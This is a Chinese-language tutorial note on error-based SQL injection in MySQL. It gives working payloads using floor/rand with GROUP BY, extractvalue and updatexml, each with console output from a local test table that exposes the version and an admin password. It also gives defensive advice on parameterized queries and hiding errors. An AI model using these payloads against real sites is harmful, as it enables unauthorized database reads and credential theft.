放点原来的笔记：MySQL 在执行出错的语句时会返回带有数据内容的错误信息，而 PHP+MySQL 架构的网站往往又把数据库错误原样显示在页面上，这样就可以通过构造下面三种报错语句来读取特定数据。（防御角度：这三种方法的前提都是应用把数据库错误回显给用户，因此应使用预处理语句/参数化查询，并关闭页面上的错误回显，统一返回通用错误页。）
实际测试环境（MySQL 5.1.33-community-log，数据库 test，两张表 admin / article）：
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1、通过 floor 报错
原理：对包含 floor(rand(0)*2) 的计算列做 group by 时，MySQL 会把分组键写入临时表；rand(0) 带固定种子、取值序列是确定的，插入时会产生重复键，从而抛出 Duplicate entry 错误，而错误信息中会带出拼接进分组键的数据。作为数据源的子查询至少要有三行才能稳定触发（下面分别用 information_schema.tables 和三行 union 来提供）。可以通过如下一些利用代码：
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
举例如下：
首先进行正常查询：
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
假如 id 参数存在注入的话，可以通过如下语句触发报错（注意拼进 concat 的子查询必须只返回一行，所以后面用了 where id = 1 或 limit 1）。
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了 MySQL 的版本（5.1.33-community-log，末尾的 1 是 floor(rand(0)*2) 拼上去的，不属于数据）。如果需要查询其他数据，把 version() 所在位置换成对应的子查询即可。
例如我们需要查询管理员用户名和密码：
Method1:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue
测试语句如下（extractvalue() 和 updatexml() 需要 MySQL 5.1.5 及以上版本；第二个参数不是合法 XPath 时会报错并把该串原样带出，0x5c 即反斜杠，用来保证一定报错。注意 XPATH 报错信息只显示前 32 个字符，较长数据需配合 substr() 分段读取）：
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程：
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、UpdateXml
测试语句（0x5e24 即 ^$，数据前后各拼一次作为分隔符，既保证触发 XPath 语法错误，也便于从报错信息中截取数据；同样只显示前 32 个字符）：
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程：
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
以上。感谢国外研究者最初整理的这些方法。